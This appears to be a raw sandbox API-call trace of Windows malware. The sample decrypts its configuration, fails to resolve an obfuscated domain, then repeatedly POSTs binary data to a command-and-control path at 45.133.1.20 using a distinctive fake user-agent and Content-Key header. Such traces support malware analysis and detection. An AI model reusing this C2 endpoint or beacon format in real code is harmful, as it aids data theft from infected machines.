[0206.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.879] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.879] GetProcessHeap () returned 0x6a0000 [0206.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0206.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.881] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0206.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.889] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0206.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.891] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0206.891] GetProcessHeap () returned 0x6a0000 [0206.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0206.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.892] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0206.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.893] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0206.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.898] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0206.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.899] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0206.899] GetProcessHeap () returned 0x6a0000 [0206.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0206.899] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0206.899] GetProcessHeap () returned 0x6a0000 [0206.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0206.900] GetProcessHeap () returned 0x6a0000 [0206.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0206.900] GetProcessHeap () returned 0x6a0000 [0206.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0206.900] GetProcessHeap () returned 0x6a0000 [0206.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0206.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0206.923] GetProcessHeap () returned 0x6a0000 [0206.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0206.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.924] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0206.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.926] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.931] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.931] GetProcessHeap () returned 0x6a0000 [0206.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0206.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.933] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0206.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.934] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0206.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.936] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0206.936] GetProcessHeap () returned 0x6a0000 [0206.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0206.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.940] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0206.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.941] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0206.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.942] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0206.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.943] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0206.943] GetProcessHeap () returned 0x6a0000 [0206.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0206.943] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0206.943] GetProcessHeap () returned 0x6a0000 [0206.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0206.943] socket (af=2, type=1, protocol=6) returned 0x584 [0206.944] connect (s=0x584, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0206.973] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0206.973] GetProcessHeap () returned 0x6a0000 [0206.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0206.973] GetProcessHeap () returned 0x6a0000 [0206.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0206.974] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0206.975] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0206.975] GetProcessHeap () returned 0x6a0000 [0206.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0206.975] GetProcessHeap () returned 0x6a0000 [0206.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0206.976] GetProcessHeap () returned 0x6a0000 [0206.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0206.976] GetProcessHeap () returned 0x6a0000 [0206.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0206.977] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0206.978] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0206.978] GetProcessHeap () returned 0x6a0000 [0206.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0206.978] GetProcessHeap () returned 0x6a0000 [0206.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0206.979] send (s=0x584, buf=0x6b5c98*, len=242, flags=0) returned 242 [0206.980] send (s=0x584, buf=0x6bb998*, len=159, flags=0) returned 159 [0206.980] GetProcessHeap () returned 0x6a0000 [0206.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0206.980] recv (in: s=0x584, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0207.270] GetProcessHeap () returned 0x6a0000 [0207.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0207.271] GetProcessHeap () returned 0x6a0000 [0207.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0207.271] GetProcessHeap () returned 0x6a0000 [0207.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0207.271] GetProcessHeap () returned 0x6a0000 [0207.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0207.272] closesocket (s=0x584) returned 0 [0207.272] GetProcessHeap () returned 0x6a0000 [0207.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0207.273] GetProcessHeap () returned 0x6a0000 [0207.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0207.273] GetProcessHeap () returned 0x6a0000 [0207.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0207.273] GetProcessHeap () returned 0x6a0000 [0207.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0207.274] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd70) returned 0x584 [0207.276] Sleep (dwMilliseconds=0xea60) [0207.281] GetProcessHeap () returned 0x6a0000 [0207.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0207.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.283] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0207.320] GetProcessHeap () returned 0x6a0000 [0207.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0207.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.322] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0207.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.326] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.328] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.328] GetProcessHeap () returned 0x6a0000 [0207.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0207.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.330] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0207.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.331] CryptDestroyKey (hKey=0x6ad020) returned 1 [0207.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.332] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0207.332] GetProcessHeap () returned 0x6a0000 [0207.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0207.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.336] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0207.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.337] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0207.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.338] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0207.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.339] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0207.340] GetProcessHeap () returned 0x6a0000 [0207.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0207.340] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0207.340] GetProcessHeap () returned 0x6a0000 [0207.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0207.341] GetProcessHeap () returned 0x6a0000 [0207.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0207.341] GetProcessHeap () returned 0x6a0000 [0207.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0207.342] GetProcessHeap () returned 0x6a0000 [0207.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0207.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.344] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0207.366] GetProcessHeap () returned 0x6a0000 [0207.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0207.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.369] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0207.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.370] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.371] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.371] GetProcessHeap () returned 0x6a0000 [0207.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0207.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.373] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0207.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.373] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0207.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.374] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0207.374] GetProcessHeap () returned 0x6a0000 [0207.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0207.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.375] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0207.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.377] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0207.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.380] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0207.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.381] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0207.381] GetProcessHeap () returned 0x6a0000 [0207.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0207.381] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0207.381] GetProcessHeap () returned 0x6a0000 [0207.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0207.381] socket (af=2, type=1, protocol=6) returned 0x588 [0207.382] connect (s=0x588, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0207.420] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0207.420] GetProcessHeap () returned 0x6a0000 [0207.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0207.420] GetProcessHeap () returned 0x6a0000 [0207.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c6720 [0207.421] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0207.422] wvsprintfA (in: param_1=0x6c6720, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0207.422] GetProcessHeap () returned 0x6a0000 [0207.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0207.423] GetProcessHeap () returned 0x6a0000 [0207.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0207.424] GetProcessHeap () returned 0x6a0000 [0207.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0207.424] GetProcessHeap () returned 0x6a0000 [0207.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c6720 [0207.425] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0207.425] wvsprintfA (in: param_1=0x6c6720, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0207.425] GetProcessHeap () returned 0x6a0000 [0207.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0207.425] GetProcessHeap () returned 0x6a0000 [0207.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0207.426] send (s=0x588, buf=0x6b5c98*, len=242, flags=0) returned 242 [0207.426] send (s=0x588, buf=0x6bb998*, len=159, flags=0) returned 159 [0207.426] GetProcessHeap () returned 0x6a0000 [0207.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0207.426] recv (in: s=0x588, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0207.505] GetProcessHeap () returned 0x6a0000 [0207.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0207.505] GetProcessHeap () returned 0x6a0000 [0207.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0207.506] GetProcessHeap () returned 0x6a0000 [0207.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0207.507] GetProcessHeap () returned 0x6a0000 [0207.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0207.507] closesocket (s=0x588) returned 0 [0207.507] GetProcessHeap () returned 0x6a0000 [0207.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0207.508] GetProcessHeap () returned 0x6a0000 [0207.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0207.508] GetProcessHeap () returned 0x6a0000 [0207.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0207.508] GetProcessHeap () returned 0x6a0000 [0207.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0207.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9cc) returned 0x588 [0207.511] Sleep (dwMilliseconds=0xea60) [0207.513] GetProcessHeap () returned 0x6a0000 [0207.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0207.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.514] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.539] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0207.546] GetProcessHeap () returned 0x6a0000 [0207.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0207.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.547] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0207.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.548] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.549] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.552] GetProcessHeap () returned 0x6a0000 [0207.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0207.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.553] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0207.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.554] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0207.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.555] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0207.555] GetProcessHeap () returned 0x6a0000 